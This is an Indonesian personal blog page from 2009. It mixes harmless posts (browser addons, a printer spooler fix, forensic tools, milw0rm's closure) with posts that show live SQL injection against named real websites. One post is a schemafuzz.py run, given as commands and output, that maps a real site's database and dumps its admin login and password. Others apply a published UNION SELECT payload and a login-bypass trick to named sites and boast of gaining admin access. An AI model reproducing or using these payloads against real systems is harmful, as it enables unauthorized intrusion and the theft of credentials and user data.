addons favorit

- Pray Times! 1.1.3, download disini
- Kaskus Menu 2.5.2, download disini
- Adblock Plus 1.1, download disini
- DownThemAll 1.1.4, download disini
- HackBar 1.4.2, download disini

7/30/2009 01:36:00 PM | | 0 Comments  

APBook 1.3.0 (Login Bypass) SQL Injection Vulnerability

Dengan merujuk ke website milw0rm, maka gue menemukan salah satu target dengan alamat website www.letsdancedisco.de/apbook/index.php lalu ubah menjadi www.letsdancedisco.de/apbook/admin/index.php, kemudian isi username & password dg teknik sql Injection tsb. Maka anda telah menjadi admin

Masih banyak lagi target yg bisa di inject :D

7/22/2009 10:32:00 AM | | 0 Comments  

[POC] Schemafuzz.py

Software:
- OS Windos
- Browser mozilla
- Python 2.5 (download disini)
- Schemafuzz.py (download disini)

Target : http://justclone.com/alibabaclone/category.php?IndustryID=44

POC:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
C:\Python25>schemafuzz.py --findcol -u http://justclone.com/alibabaclone/category.php?IndustryID=44--

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44--
[+] Evasion Used: "+" "--"
[+] 13:31:32
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,
[+] Column Length is: 2
[+] Found null column at column #: 1
[+] SQLi URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,1--
[+] darkc0de URL: http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de
[-] Done!

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --dbs -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:34:31
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0]justclo_alibaba

[-] [13:34:35]
[-] Total URL Requests 3
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --schema -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 13:37:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Showing Tables & Columns from database "justclo_alibaba"
[+] Number of Tables: 60

[Database]: justclo_alibaba
[Table: Columns]
[0]admin:

LoginID,Password,AdminEmail,AdminEmailPassword,smtp,ScriptName,url,smtpstatus,port,Title,nochex,twoco,paypal,goldmemberfee
[1]all_leads: AllLeadsID,LeadID,LeadType,leadstatus,LeadAddedDate
[2]buyer: BuyerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,featured
[3]buyer_blogs: BuyerBlogID,BlogTitle,BlogStatus,Blog,BuyerID,BlogAddedDate
[4]buyer_leads:
BuyerLeadID,BuyerID,Subject,ProductKeyword,MoreKeywords,CategoryID,Details,Quantity,Packaging,ValidDates,PurchaseType,ProductPhoto,thumb1,thumb2,AddedDate,ExpiryDate,ExpireAfter,buyingleadstatus
[5]buyer_messages:
BuyerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[6]buyer_profile:
BuyerProfileID,BuyerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,bigbuyer,DateAdded
[7]buyer_video: BuyerVideoID,BuyerID,video,AddedDate
[8]buyercomments: CommentID,Comment,BuyerID,Rating,CommentBy,Status,AddedDate
[9]categories: CategoryID,IndustryID,Category
[10]contactus: contactus,note
[11]countries: CountryID,Country
[12]countries_show: CountryShowID,Country,Logo,LogoThumb,AddedDate
[13]industry: IndustryID,Industry
[14]news: NewsID,Title,Details,AddedDate,hot
[15]newsletter_subscribers: id,email,ConfirmationCode,status,AddedDate
[16]partner_sites: PartnerSiteID,logo,url,AddedDate
[17]phpbb_auth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[18]phpbb_banlist: ban_id,ban_userid,ban_ip,ban_email
[19]phpbb_categories: cat_id,cat_title,cat_order
[20]phpbb_config: config_name,config_value
[21]phpbb_confirm: confirm_id,session_id,code
[22]phpbb_disallow: disallow_id,disallow_username
[23]phpbb_forum_prune: prune_id,forum_id,prune_days,prune_freq
[24]phpbb_forums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[25]phpbb_groups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[26]phpbb_posts:
post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[27]phpbb_posts_text: post_id,bbcode_uid,post_subject,post_text
[28]phpbb_privmsgs:
privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[29]phpbb_privmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[30]phpbb_ranks: rank_id,rank_title,rank_min,rank_special,rank_image
[31]phpbb_search_results: search_id,session_id,search_time,search_array
[32]phpbb_search_wordlist: word_text,word_id,word_common
[33]phpbb_search_wordmatch: post_id,word_id,title_match
[34]phpbb_sessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[35]phpbb_sessions_keys: key_id,user_id,last_ip,last_login
[36]phpbb_smilies: smilies_id,code,smile_url,emoticon
[37]phpbb_themes:
themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[38]phpbb_themes_name:
themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[39]phpbb_topics:
topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[40]phpbb_topics_watch: topic_id,user_id,notify_status
[41]phpbb_user_group: group_id,user_id,user_pending
[42]phpbb_users:
user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[43]phpbb_vote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[44]phpbb_vote_results: vote_id,vote_option_id,vote_option_text,vote_result
[45]phpbb_vote_voters: vote_id,vote_user_id,vote_user_ip
[46]phpbb_words: word_id,word,replacement
[47]products:
ProductID,SellerID,ProductPhoto,ProductPhoto2,ProductPhoto3,ProductPhoto4,thumb1,thumb2,thumb3,thumb1_2,thumb1_3,thumb1_4,thumb2_2,thumb2_3,thumb2_4,thumb3_2,thumb3_3,thumb3_4,ProductName,ModelNo,ProductKeyword,CategoryID,ProductDescription,PlaceOfOrigin,BrandName,PriceTerms,Price,Packing,PaymentTerms,DeliveryTime,MinimumOrders,SupplyAbility,QualityCertification,AddedDate,productstatus,viewcounter,featured
[48]rightbanners: id,CategoryID,Banner,page,link,BannerNumber,AddedDate
[49]seller:
SellerID,Password,BusinessEmail,FirstName,LastName,Sex,IndustryID,StreetAddress,StreetAddress2,StreetAddress3,City,Province,Country,Zip_PostelCode,Phone,Mobile,Active,ConfirmationCode,GoldMember,GoldMemberDate,Fax,Website,MemberSince,Gold,featured
[50]seller_blogs: SellerBlogID,BlogTitle,BlogStatus,Blog,SellerID,BlogAddedDate
[51]seller_categories: SellerCategoryID,SellerID,CategoryID
[52]seller_messages:
SellerMessageID,SenderID,SenderType,RecieverID,ReadStatus,Subject,Message,CompanyName,ContactName,StreetAddress,StreetAddress2,StreetAddress3,Phone,Email,Fax,Website,MessageDate
[53]seller_profile:
SellerProfileID,SellerID,CompanyName,CompanyLogo,CompanyLogo2,BusinessType,JobTitle,NumOfEmployees,LegalRepresentative,AnnualSalesRange,YearEstablished,Certifications,CompanyIntroduction,KeyProducts,AboutUs,AboutUsImage,DateAdded
[54]seller_video: SellerVideoID,SellerID,video,AddedDate
[55]sellercomments: CommentID,Comment,SellerID,Rating,CommentBy,Status,AddedDate
[56]selling_leads:
SellingLeadID,Subject,ProductPhoto,thumb1,thumb2,BriefDescription,DetailedDescription,Keyword,CategoryID,SellerID,AddedDate,ExpiryDate,ExpireAfter,sellingleadstatus,featured
[57]success_stories: SuccessStoryID,Title,Name,Thumb,Details,AddedDate
[58]topbanners: id,SubCategoryID,Banner,page,link,CategoryID,AddedDate
[59]trade_shows: TradeShowID,Name,Logo,LogoThumb,StartDate,EndDate,Address,OpenTime,url,AddedDate

[-] [13:49:10]
[-] Total URL Requests 580
[-] Done

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|

C:\Python25>schemafuzz.py --dump -u http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de -D justclo_alibaba -T admin -C LoginID,Password

[+] URL:http://justclone.com/alibabaclone/category.php?IndustryID=44+AND+1=2+UNION+SELECT+0,darkc0de--
[+] Evasion Used: "+" "--"
[+] 14:03:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: justclo_alibaba
User: justclo_alibab@localhost
Version: 5.0.81-community
[+] Dumping data from database "justclo_alibaba" Table "admin"
[+] Column(s) ['LoginID', 'Password']
[+] Number of Rows: 1

[0] admin:admin123:admin123:

[-] [14:03:15]
[-] Total URL Requests 3
[-] Done

7/21/2009 04:41:00 PM | | 0 Comments  

Bye bye milw0rm

Mungkin para fans berat milw0rm (termasuk gue sendiri :)) sudah banyak yang mengetahui bahwa milw0rm dinyatakan akan ditutup. Alasannya mungkin bisa dilihat dari berita ini, walaupun beberapa rumor banyak yang beredar bahwa ada alasan lain dibalik semua ini yang mengharuskan str0ke menutup milw0rm. Namun dari twitter-nya str0ke sepertinya akan ada angin baik mengenai milw0rm, we’ll see.

Mungkin sudah saatnya mencari alternatif lain?!packetstormsecurity atau securityfocus masih tetap memberikan archive exploits, tools, serta POC tiap bulannya, atau mungkin sudah saatnya situs ini mendapatkan lebih banyak hits terutama bagi mereka yang merindukan suasana milw0rm.

sumber:
- Kecoak elektronik

7/15/2009 05:48:00 PM | | 0 Comments  

[POC] Expert Advisior SQL Injection Vulnerability

Iseng jalan² ke Jatim dapet oleh² :

AUTHOR: t0pP8uZz & xprog
SITE: N/A DORK: intitle:"Answer Builder"  Ask a question
DESCRIPTION:
pull out admin user/pass from the database
EXPLOITS:
http://server.com/Script_Path/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),9,10,11,12,13,14,15/**/FROM/**/admin/*
NOTE/TIP:
admin login is at /admin/ you can backup DB there.

Lalu gw coba cari kutunya disini dengan memasukkan dork-nya, beberapa detik kemudian dapet 1 website yg keliatannya bisa di injek siqil. Nih dia webnya http://www.rotorheads.co.uk/index.php?cmd=4&id=1. Sesuai dengan petunjuk diatas, lalu gw tambahin menjadi:

http://www.rotorheads.co.uk/index.php?cmd=4&id=1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,@@version,concat%280x3c623e,username,0x3a,password,0x3c623e%29,9,10,11,12,13,14,15/**/FROM/**/admin/*

Can you see the password? :)

7/07/2009 03:21:00 PM | | 0 Comments  

printer ngilang

Tiba² list di printer & faxes ilang pada saat mau ngeprint. Kenapa ya? Gue coba nge-add ulang printer di jaringan kantor tapi ga bisa malah muncul error "Operation could not be completed", hm... kenapa nih? Gue coba restore OS Windos XP gagal. Gue coba tanya ke paman googel, akhirnya dapet jawaban. Lets try,

cara pertamax:
- klik Start, masuk run
- ketik "net start spooler". Tanpa tanda petik
atau cara keduax:
- Klik Start, dan klik Control Panel.
- Double-click Administrative Tools, kemudian klik Services.
- Double-click Printer Spooler service, kemudian ubah tipe startup ke Automatic. Hal ini akan menjadikan service Spooler start secara otomatis pada saat komputer restart.
sumber: Microsoft

7/06/2009 11:03:00 AM | | 0 Comments  

software FBI

Ini adalah satu dari 11 paket software yang berguna, juga digunakan oleh FBI untuk memeriksa, dan menganalisa komputer lain yang di-hack . Untuk sebagian besar dari program-program ini, tidak perlu untuk menginstalnya karena bersifat portabel ...

Software ini meliputi:
-ADS Locator (Alternate Data Streams) -ADS Locator (alternatif Data Streaming)
-Disc Investigator 1.4 (File-Slack-Analyze) Disc-Investigator 1,4 (File-kurang Analisis)
-Historian 1.4 (Browser Analyze) -Sejarawan 1,4 (Browser Analisis)
-Live View 0.6 (System Analyze) Lihat-Live 0,6 (Sistem Analisis)
-MUI Cacheview 1.00 (Registry Analyze) MUI-Cacheview 1.00 (Registry Analisis)
-Networkminer 0.85 (Network Analyze) -Networkminer 0,85 (Jaringan Menganalisa)
-Regripper 2.02 (Registry Analyze) -Regripper 2,02 (Registry Analisis)
-Systemreport 2.54 (PC Analyze) -Systemreport 2,54 (PC Analisis)
-USB-History R1 (USB-Stick-Analyze) Sejarah-R1-USB (USB-Stick-Analisis)
-Windows File Analyzer (File Analyze) Windows Analyzer-file (File Analisis)
-Winpcap 4.02 (Network) -Winpcap 4,02 (Jaringan)

Anda bisa mendownloadnya disini atau disini atau disini

7/03/2009 04:54:00 PM | | 0 Comments  

Utekbuntu

Entah kenapa gue pengen nulis kalimat ini:

Kuhapus air mata dalam duka, Kupejamkan mata dalam duka, Kuhempaskan raga dalam elegi cintamu, dan Kurentangkan jiwa dalam sukma keabadian..

7/03/2009 04:50:00 PM | | 0 Comments  

Langganan: Postingan (Atom)


Statistics

Counter online counter Page Rank Check TopOfBlogs

100 Blog Indonesia Terbaik